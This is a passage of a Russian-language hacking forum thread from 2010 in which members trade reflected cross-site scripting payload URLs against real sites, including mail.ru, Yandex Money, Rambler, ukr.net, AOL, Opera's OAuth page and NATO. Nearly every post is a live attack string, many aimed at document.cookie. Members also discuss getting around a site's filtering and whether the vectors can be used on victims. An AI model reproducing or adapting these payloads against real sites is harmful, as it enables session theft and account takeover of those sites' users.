Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    http://rabota.mail.ru

    Code:
    http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='
    crackmail: не пашет.

    пффф, уже пофиксили
     
    #101 BlackFan, 5 Jul 2010
    Last edited: 6 Jul 2010
    3 people like this.
  2. BluR

    BluR Member

    Joined:
    6 Aug 2009
    Messages:
    7
    Likes Received:
    20
    Reputations:
    0
    money.yandex.ru

    https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//--></script><ScRiPt>alert(document.cookie)</ScRiPt>
     
    #102 BluR, 24 Aug 2010
    Last edited: 24 Aug 2010
    3 people like this.
  3. satana666

    satana666 Member

    Joined:
    10 Apr 2009
    Messages:
    0
    Likes Received:
    24
    Reputations:
    6
    rambler.ru

    Вроде ещё не выкладывали.
    PHP:
    http://horoscopes.rambler.ru/names.html?words="><script>alert('XSS')</script>
    PHP:
    http://dating.meta.ua/search.php?action=search&min_age="><script>alert(/XSS/)</script>
    PHP:
    http://index.online.ua/?cx=&q="><script>alert('XSS')</script>
    ukr.net
    Не знаю выкладывали или нет, гугл не ответил точно.
    PHP:
    http://freemail.ukr.net/q/reg?name="><script>alert('XSS')</script>
    PHP:
    http://kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
     
    #103 satana666, 15 Sep 2010
    Last edited: 26 Oct 2010
    3 people like this.
  4. NotLocal

    NotLocal New Member

    Joined:
    21 Jul 2010
    Messages:
    1
    Likes Received:
    4
    Reputations:
    5
    mail.ru

    Парочка пассивных xss на форумах mail.ru

    PHP:
    http://forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=<script type="text/javascript"><script>alert("xss")</script>
    PHP:
    http://forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E
     
    #104 NotLocal, 1 Oct 2010
    Last edited: 1 Oct 2010
    4 people like this.
  5. satana666

    satana666 Member

    Joined:
    10 Apr 2009
    Messages:
    0
    Likes Received:
    24
    Reputations:
    6
    Пасcивка на mail.ru
    PHP:
    http://starlook.lady.mail.ru/commented?"><script>alert('XSS')</script>
    Вот только в alert(document.cookie) точка заменяется на _
    Это можно как-нибудь обойти?
     
    3 people like this.
  6. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    так будет лучше.
    HTML:
    http://starlook.lady.mail.ru/commented?period=month"><script>alert(document.cookie)</script>
    Зря выложил ее, завтра уже будет закрыта.
     
    2 people like this.
  7. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    HTML:
    http://help.aol.com/help/microsites/searchEntry.do?&searchString="><script>alert(document.cookie)</script>
     
  8. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Code:
    http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJyTf9X"><script>alert(document.cookie)</script>
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    хотья это не почтовик, но думаю модеры простят меня :(

    http://www.nato.int/cps/en/natolive/search.htm

    "><script>alert('ololo')</script>

    PR-9
    тИЦ- 1100
     
    _________________________
    #109 Konqi, 14 Nov 2010
    Last edited: 14 Nov 2010
    2 people like this.
  10. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Code:
    http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru
    уязвимо поле - Задайте местоположение по умолчанию
    <marquee><h1>поймай меня</h1></marquee>
     
    #110 Ruslan1817, 15 Nov 2010
    Last edited: 15 Nov 2010
    6 people like this.
  11. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    снова lady.mail.ru , такой тут еще не было вроде
    Code:
    http://lady.mail.ru/product/?letter=1<script>alert(123)</script>
     
    #111 ~d0s~, 16 Nov 2010
    Last edited: 16 Nov 2010
    6 people like this.
  12. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    kids.rambler.ru
    Code:
    http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1<script>alert('~d0s~')</script>
     
    2 people like this.
  13. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    tv.ukr.net
    Code:
    http://tv.ukr.net/?scn=tv&sb=1'><script>alert(1)</script>
    Там почти весь сайт,видимо хсс они за багу не считают :(
     
  14. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    rabota.ngs.ru
    Code:
    http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1"><script>alert(1)</script>
     
  15. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    autorambler.ru
    Code:
    http://autorambler.ru/bz/pdd/pddonline/?type=1//--></script><script>alert(123)</script>
     
  16. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    realty.mail.ru
    Code:
    http://realty.mail.ru/detail/001667605.html
    Добавляем в куки имя search_res а значение ставим "><script>alert(123)</script>
    Обновляем страничку,любуемся аллертом
     
    1 person likes this.
  17. satana666

    satana666 Member

    Joined:
    10 Apr 2009
    Messages:
    0
    Likes Received:
    24
    Reputations:
    6
    В поле "Электронная почта"
    "><script>alert(document.cookie)</script>
    PHP:
    http://avito.ru.msn.com/additem
    HTML:
    http://avito.ru.msn.com/shops?name="'><script>alert(document.cookie)</script>
     
    #117 satana666, 22 Nov 2010
    Last edited: 22 Nov 2010
    2 people like this.
  18. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую....

    P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата :)
     
    #118 Kusto, 22 Nov 2010
    Last edited: 22 Nov 2010
    3 people like this.
  19. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    cards.rambler.ru
    Code:
    http://cards.rambler.ru/author.html?author=d0s&offset=1"><script>alert('true')</script>
     
    1 person likes this.
  20. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    HTML:
    http://szukaj.onet.pl/query.html?qt=777&lr=Polska"><script>alert(document.cookie)</script>
     
    #120 Ruslan1817, 30 Nov 2010
    Last edited: 30 Nov 2010
    2 people like this.